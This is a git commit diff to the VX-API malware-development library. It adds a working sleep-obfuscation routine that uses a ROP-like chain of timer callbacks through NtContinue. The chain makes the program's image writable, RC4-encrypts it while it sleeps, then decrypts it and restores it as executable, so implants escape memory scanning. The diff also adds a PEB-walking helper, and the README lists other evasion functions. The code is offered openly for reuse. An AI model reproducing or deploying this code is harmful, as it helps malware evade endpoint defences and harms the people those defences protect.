2.0.451

2022-12-13 23:55:56 -06:00 · 2022-12-13 23:55:56 -06:00 · d5ed074515
parent f107fe43a3
commit d5ed074515
12 changed files with 203 additions and 7 deletions
--- a/.gitignore
+++ b/.gitignore
@ -20,3 +20,6 @@ x64/Debug/VX-API.exe
 *.xml
 *.sarif
 *.lastcodeanalysissucceeded
+*.iobj
+*.ipdb
+*.exe
--- a/README.md
+++ b/README.md
@ -80,6 +80,7 @@ You're free to use this in any manner you please. You do not need to use this en
 | RemoveDllFromPeb | rad9800 | Evasion |
 | HookEngineRestoreHeapFree | rad9800 | Evasion |
 | HookEngineUnhookHeapFree | rad9800 | Evasion |
+| SleepObfuscationViaVirtualProtect | 5pider | Evasion |
 | GetCurrentLocaleFromTeb | 3xp0rt | Fingerprinting |
 | GetNumberOfLinkedDlls | smelly__vx | Fingerprinting |
 | GetOsBuildNumberFromPeb | smelly__vx | Fingerprinting |
@ -120,6 +121,7 @@ You're free to use this in any manner you please. You do not need to use this en
 | IsRegistryKeyValid | smelly__vx | Helper Functions |
 | FastcallExecuteBinaryShellExecuteEx | smelly__vx | Helper Functions |
 | GetCurrentProcessIdFromOffset | RistBS | Helper Functions | 
+| GetPeBaseAddress | smelly__vx | Helper Functions | 
 | GetKUserSharedData | Geoff Chappell | Library Loading |
 | GetModuleHandleEx2 | smelly__vx | Library Loading |
 | GetPeb | 29a | Library Loading |
--- a/VX-API/FunctionDeclaration.h
+++ b/VX-API/FunctionDeclaration.h
@ -31,6 +31,7 @@ typedef NTSTATUS(NTAPI* NTWAITFORSINGLEOBJECT)(HANDLE, BOOL, PLARGE_INTEGER);
 typedef NTSTATUS(NTAPI* RTLQUEUEWORKITEM)(PRTL_WORK_ITEM_ROUTINE, PVOID, ULONG);
 typedef NTSTATUS(NTAPI* RTLREGISTERWAIT)(PHANDLE, HANDLE, WORKERCALLBACKFUNC, PVOID, ULONG, ULONG);
 typedef NTSTATUS(NTAPI* RTLDEREGISTERWAITEX)(HANDLE, HANDLE);
+typedef NTSTATUS(NTAPI* NTCONTINUE)(PCONTEXT, BOOL);



@ -60,4 +61,12 @@ typedef HRESULT(WINAPI* DSCOPYFROMSHAREDFILE)(LPCWSTR, LPCWSTR);
 /*******************************************
 SHELL32 IMPORT
 *******************************************/
-typedef HRESULT(WINAPI* DLLGETCLASSOBJECT)(REFCLSID, REFIID, LPVOID*);
+typedef HRESULT(WINAPI* DLLGETCLASSOBJECT)(REFCLSID, REFIID, LPVOID*);
+
+
+
+/*******************************************
+ ADVAPI32 IMPORT
+*******************************************/
+
+typedef NTSTATUS(NTAPI* SYSTEMFUNCTION032)(PAB_STRING, PAB_STRING);
--- a/VX-API/GetPeFileBaseAddress.cpp
+++ b/VX-API/GetPeFileBaseAddress.cpp
@ -0,0 +1,14 @@
+#include "Win32Helper.h"
+
+HMODULE GetPeFileBaseAddress(VOID)
+{
+	PPEB Peb = GetPebFromTeb();
+	PLDR_MODULE Module = NULL;
+
+	Module = (PLDR_MODULE)((PBYTE)Peb->LoaderData->InMemoryOrderModuleList.Flink - 16);
+
+	if (!Module)
+		return NULL;
+
+	return (HMODULE)(Module->BaseAddress ? Module->BaseAddress : NULL);
+}
--- a/VX-API/HashStringDjb2.cpp
+++ b/VX-API/HashStringDjb2.cpp
@ -3,7 +3,7 @@
 DWORD HashStringDjb2A(_In_ PCHAR String)
 {
 	ULONG Hash = 5381;
-	INT c;
+	INT c = 0;

 	while (c = *String++)
 		Hash = ((Hash << 5) + Hash) + c;
@ -14,7 +14,7 @@ DWORD HashStringDjb2A(_In_ PCHAR String)
 DWORD HashStringDjb2W(_In_ PWCHAR String)
 {
 	ULONG Hash = 5381;
-	INT c;
+	INT c = 0;

 	while (c = *String++)
 		Hash = ((Hash << 5) + Hash) + c;
--- a/VX-API/HookEngineUnhookHeapFreecpp.cpp
+++ b/VX-API/HookEngineUnhookHeapFreecpp.cpp
@ -2,7 +2,7 @@

 VOID HeapFreeInterceptionRoutine(PEXCEPTION_POINTERS ExceptionInfo)
 {
-	CONST DWORD dwSize = HeapSize((HANDLE)ExceptionInfo->ContextRecord->Rcx, (DWORD)ExceptionInfo->ContextRecord->Rdx, (LPCVOID)ExceptionInfo->ContextRecord->R8);
+	CONST DWORD dwSize = (DWORD)HeapSize((HANDLE)ExceptionInfo->ContextRecord->Rcx, (DWORD)ExceptionInfo->ContextRecord->Rdx, (LPCVOID)ExceptionInfo->ContextRecord->R8);

 	if (dwSize)
 		ZeroMemoryEx((PVOID)ExceptionInfo->ContextRecord->R8, dwSize);
--- a/VX-API/Internal.h
+++ b/VX-API/Internal.h
@ -1126,3 +1126,8 @@ typedef VOID(NTAPI* PIO_APC_ROUTINE)(PVOID ApcContext, _In_ PIO_STATUS_BLOCK IoS

 typedef DWORD(CALLBACK* PRTL_WORK_ITEM_ROUTINE)(LPVOID);

+typedef struct AMBIGUOUS_STRING {
+	DWORD Length;
+	DWORD MaximumLength;
+	PUCHAR Buffer;
+}AB_STRING, * PAB_STRING;
--- a/VX-API/Main.cpp
+++ b/VX-API/Main.cpp
@ -37,8 +37,10 @@ int main(VOID)

 	//ShellcodeExecutionViaFunctionCallbackMain(&Sei);

-	__demonstration_WinMain();
-	
+	//hasha(NtMapViewOfSection);
+	UCHAR KeyBuf[17] = { 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x00};
+
+	SleepObfuscationViaVirtualProtect(4000, KeyBuf);

 	return dwError;
 }
--- a/VX-API/SleepObfuscationViaVirtualProtect.cpp
+++ b/VX-API/SleepObfuscationViaVirtualProtect.cpp
@ -0,0 +1,142 @@
+#include "Win32Helper.h"
+
+
+BOOL SleepObfuscationViaVirtualProtect(_In_ DWORD dwSleepTimeInMilliseconds, _In_ PUCHAR Key)
+{
+	BOOL bFlag = FALSE;
+	NTCONTINUE NtContinue = NULL;
+	SYSTEMFUNCTION032 SystemFunction032 = NULL;
+	HMODULE hNtdll = NULL, hAdvapi32 = NULL;
+
+	PIMAGE_DOS_HEADER Dos = NULL;
+	PIMAGE_FILE_HEADER File = NULL;
+	PIMAGE_NT_HEADERS Nt = NULL;
+	PIMAGE_OPTIONAL_HEADER Optional = NULL;
+
+	HMODULE ImageBaseAddress = NULL;
+
+	CONTEXT ContextThread = { 0 }, RopVirtualProtectReadWrite = { 0 }, RopSystemFunction032Encryption = { 0 }, RopWaitForSingleObject = { 0 };
+	CONTEXT RopSystemFunction032Decryption = { 0 }, RopVirtualProtectExecute = { 0 }, RopSetEvent = { 0 };
+	AB_STRING BinaryKey = { 0 }, ImageBuffer = { 0 };
+
+	HANDLE hTimer = NULL, hTimerQueue = NULL, hEvent = NULL;
+
+	DWORD PreviousProtectionAttribute = ERROR_SUCCESS;
+
+	hNtdll = GetModuleHandleEx2W(L"ntdll.dll");
+	if (hNtdll == NULL)
+		goto EXIT_ROUTINE;
+
+	hAdvapi32 = TryLoadDllMultiMethodW((PWCHAR)L"cryptsp.dll");
+	if (hAdvapi32 == NULL)
+		goto EXIT_ROUTINE;
+
+	NtContinue = (NTCONTINUE)GetProcAddressA((DWORD64)hNtdll, "NtContinue");
+	SystemFunction032 = (SYSTEMFUNCTION032)GetProcAddressA((DWORD64)hAdvapi32, "SystemFunction032");
+
+	if (!NtContinue || !SystemFunction032)
+		goto EXIT_ROUTINE;
+
+	ImageBaseAddress = GetPeFileBaseAddress();
+	if (ImageBaseAddress == NULL)
+		goto EXIT_ROUTINE;
+
+	RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, (PBYTE*)&ImageBaseAddress);
+
+	hEvent = CreateEventW(0, 0, 0, 0);
+	if (hEvent == NULL)
+		goto EXIT_ROUTINE;
+
+	hTimerQueue = CreateTimerQueue();
+	if (hTimerQueue == NULL)
+		goto EXIT_ROUTINE;
+
+	BinaryKey.Buffer = Key;
+	BinaryKey.Length = BinaryKey.MaximumLength = 17;
+
+	ImageBuffer.Buffer = (PUCHAR)ImageBaseAddress;
+	ImageBuffer.Length = ImageBuffer.MaximumLength = Optional->SizeOfImage;
+
+	if (!CreateTimerQueueTimer(&hTimer, hTimerQueue, (WAITORTIMERCALLBACK)RtlCaptureContext, &ContextThread, 0, 0, WT_EXECUTEINTIMERTHREAD))
+		goto EXIT_ROUTINE;
+
+	WaitForSingleObject(hEvent, 0x32);
+
+	if (CopyMemoryEx(&RopVirtualProtectReadWrite, &ContextThread, sizeof(CONTEXT)) == NULL)
+		goto EXIT_ROUTINE;
+
+	if (CopyMemoryEx(&RopSystemFunction032Encryption, &ContextThread, sizeof(CONTEXT)) == NULL)
+		goto EXIT_ROUTINE;
+
+	if (CopyMemoryEx(&RopWaitForSingleObject, &ContextThread, sizeof(CONTEXT)) == NULL)
+		goto EXIT_ROUTINE;
+
+	if (CopyMemoryEx(&RopSystemFunction032Decryption, &ContextThread, sizeof(CONTEXT)) == NULL)
+		goto EXIT_ROUTINE;
+
+	if (CopyMemoryEx(&RopVirtualProtectExecute, &ContextThread, sizeof(CONTEXT)) == NULL)
+		goto EXIT_ROUTINE;
+	
+	if (CopyMemoryEx(&RopSetEvent, &ContextThread, sizeof(CONTEXT)) == NULL)
+		goto EXIT_ROUTINE;
+
+	// VirtualProtect
+	RopVirtualProtectReadWrite.Rsp -= 8;
+	RopVirtualProtectReadWrite.Rip = (DWORD64)VirtualProtect;
+	RopVirtualProtectReadWrite.Rcx = (DWORD64)ImageBaseAddress;
+	RopVirtualProtectReadWrite.Rdx = Optional->SizeOfImage;
+	RopVirtualProtectReadWrite.R8 = PAGE_READWRITE;
+	RopVirtualProtectReadWrite.R9 = (DWORD64)&PreviousProtectionAttribute;
+
+	// SystemFunction032
+	RopSystemFunction032Encryption.Rsp -= 8;
+	RopSystemFunction032Encryption.Rip = (DWORD64)SystemFunction032;
+	RopSystemFunction032Encryption.Rcx = (DWORD64)&ImageBuffer;
+	RopSystemFunction032Encryption.Rdx = (DWORD64)&BinaryKey;
+
+	// WaitForSingleObject
+	RopWaitForSingleObject.Rsp -= 8;
+	RopWaitForSingleObject.Rip = (DWORD64)WaitForSingleObject;
+	RopWaitForSingleObject.Rcx = (DWORD64)InlineGetCurrentProcess;
+	RopWaitForSingleObject.Rdx = dwSleepTimeInMilliseconds;
+
+	// SystemFunction032
+	RopSystemFunction032Decryption.Rsp -= 8;
+	RopSystemFunction032Decryption.Rip = (DWORD64)SystemFunction032;
+	RopSystemFunction032Decryption.Rcx = (DWORD64)&ImageBuffer;
+	RopSystemFunction032Decryption.Rdx = (DWORD64)&BinaryKey;
+
+	// VirtualProtect
+	RopVirtualProtectExecute.Rsp -= 8;
+	RopVirtualProtectExecute.Rip = (DWORD64)VirtualProtect;
+	RopVirtualProtectExecute.Rcx = (DWORD64)ImageBaseAddress;
+	RopVirtualProtectExecute.Rdx = Optional->SizeOfImage;
+	RopVirtualProtectExecute.R8 = PAGE_EXECUTE_READWRITE;
+	RopVirtualProtectExecute.R9 = (DWORD64)&PreviousProtectionAttribute;
+
+	// SetEvent
+	RopSetEvent.Rsp -= 8;
+	RopSetEvent.Rip = (DWORD64)SetEvent;
+	RopSetEvent.Rcx = (DWORD64)hEvent;
+
+	CreateTimerQueueTimer(&hTimer, hTimerQueue, (WAITORTIMERCALLBACK)NtContinue, &RopVirtualProtectReadWrite, 100, 0, WT_EXECUTEINTIMERTHREAD);
+	CreateTimerQueueTimer(&hTimer, hTimerQueue, (WAITORTIMERCALLBACK)NtContinue, &RopSystemFunction032Encryption, 200, 0, WT_EXECUTEINTIMERTHREAD);
+	CreateTimerQueueTimer(&hTimer, hTimerQueue, (WAITORTIMERCALLBACK)NtContinue, &RopWaitForSingleObject, 300, 0, WT_EXECUTEINTIMERTHREAD);
+	CreateTimerQueueTimer(&hTimer, hTimerQueue, (WAITORTIMERCALLBACK)NtContinue, &RopSystemFunction032Decryption, 400, 0, WT_EXECUTEINTIMERTHREAD);
+	CreateTimerQueueTimer(&hTimer, hTimerQueue, (WAITORTIMERCALLBACK)NtContinue, &RopVirtualProtectExecute, 500, 0, WT_EXECUTEINTIMERTHREAD);
+	CreateTimerQueueTimer(&hTimer, hTimerQueue, (WAITORTIMERCALLBACK)NtContinue, &RopSetEvent, 600, 0, WT_EXECUTEINTIMERTHREAD);
+
+	WaitForSingleObject(hEvent, INFINITE);
+
+	bFlag = TRUE;
+
+EXIT_ROUTINE:
+
+#pragma warning( push )
+#pragma warning( disable : 6031)
+	if(hTimerQueue)
+		DeleteTimerQueue(hTimerQueue);
+#pragma warning( pop ) 
+
+	return bFlag;
+}
--- a/VX-API/VX-API.vcxproj
+++ b/VX-API/VX-API.vcxproj
@ -104,7 +104,7 @@
      <SDLCheck>true</SDLCheck>
      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
      <ConformanceMode>true</ConformanceMode>
-      <LanguageStandard>stdcpp17</LanguageStandard>
+      <LanguageStandard>stdcpp20</LanguageStandard>
    </ClCompile>
    <Link>
      <SubSystem>Console</SubSystem>
@ -119,6 +119,7 @@
      <SDLCheck>true</SDLCheck>
      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
      <ConformanceMode>true</ConformanceMode>
+      <LanguageStandard>stdcpp20</LanguageStandard>
    </ClCompile>
    <Link>
      <SubSystem>Console</SubSystem>
@ -181,6 +182,7 @@
    <ClCompile Include="GetOsMinorVersionFromPeb.cpp" />
    <ClCompile Include="GetOsPlatformIdFromPeb.cpp" />
    <ClCompile Include="GetPeb.cpp" />
+    <ClCompile Include="GetPeFileBaseAddress.cpp" />
    <ClCompile Include="GetPidFromEnumProcesses.cpp" />
    <ClCompile Include="GetPidFromNtQueryFileInformation.cpp" />
    <ClCompile Include="GetPidFromNtQuerySystemInformation.cpp" />
@ -244,6 +246,7 @@
    <ClCompile Include="RemoveDescriptorEntry.cpp" />
    <ClCompile Include="SetHardwareBreakpoint.cpp" />
    <ClCompile Include="ShutdownHardwareBreakpointEngine.cpp" />
+    <ClCompile Include="SleepObfuscationViaVirtualProtect.cpp" />
    <ClCompile Include="SnapshotInsertHardwareBreakpointHookIntoTargetThread.cpp" />
    <ClCompile Include="__unstable__preview__MpfSilentInstallGoogleChromePlugin.cpp" />
    <ClCompile Include="SendIcmpEchoMessageToIPv4Host.cpp" />
--- a/VX-API/VX-API.vcxproj.filters
+++ b/VX-API/VX-API.vcxproj.filters
@ -513,6 +513,12 @@
    <ClCompile Include="HookEngineUnhookHeapFreecpp.cpp">
      <Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
    </ClCompile>
+    <ClCompile Include="SleepObfuscationViaVirtualProtect.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
+    </ClCompile>
+    <ClCompile Include="GetPeFileBaseAddress.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
+    </ClCompile>
  </ItemGroup>
  <ItemGroup>
    <ClInclude Include="Internal.h">
--- a/VX-API/Win32Helper.h
+++ b/VX-API/Win32Helper.h
@ -15,6 +15,7 @@
 #include <icmpapi.h>
 #include <windns.h>
 #include <tlhelp32.h>
+#include <stdio.h>


 #pragma comment(lib, "Dnsapi.lib")
@ -140,6 +141,13 @@ DWORD RtlNtStatusToDosErrorViaImport(_In_ NTSTATUS Status);
 /*******************************************
 CRYPTOGRAPHY RELATED
 *******************************************/
+//#define TOKENIZE( x ) #x
+//#define CONCAT3( X, Y, Z ) X##Y##Z
+//#define HASHALGOA HashStringDjb2A
+//#define hasha( VAL ) constexpr auto CONCAT3(hash,VAL,A) = HASHALGOA((PCHAR)TOKENIZE(VAL))
+//#define hashw( VAL ) constexpr auto CONCAT3(hash,VAL,W) = HASHALGOA((PWCHAR)TOKENIZE(VAL))
+
+
 DWORD HashStringDjb2A(_In_ PCHAR String);
 DWORD HashStringDjb2W(_In_ PWCHAR String);
 ULONG HashStringFowlerNollVoVariant1aA(_In_ PCHAR String);
@ -244,6 +252,7 @@ DWORD IsRegistryKeyValidW(_In_ HKEY PredefinedKey, _In_ PWCHAR Path);
 BOOL FastcallExecuteBinaryShellExecuteExW(_In_ PWCHAR FullPathToBinary, _In_ PWCHAR OptionalParameters);
 BOOL FastcallExecuteBinaryShellExecuteExA(_In_ PCHAR FullPathToBinary, _In_ PCHAR OptionalParameters);
 DWORD GetCurrentProcessIdFromOffset(VOID);
+HMODULE GetPeFileBaseAddress(VOID);



@ -324,6 +333,7 @@ BOOL RemoveDllFromPebA(_In_ LPCSTR lpModuleName);
 BOOL RemoveDllFromPebW(_In_ LPCWSTR lpModuleName);
 BOOL HookEngineUnhookHeapFree(_In_ BOOL StartEngine);
 BOOL HookEngineRestoreHeapFree(_In_ BOOL ShutdownEngine);
+BOOL SleepObfuscationViaVirtualProtect(_In_ DWORD dwSleepTimeInMilliseconds, _In_ PUCHAR Key);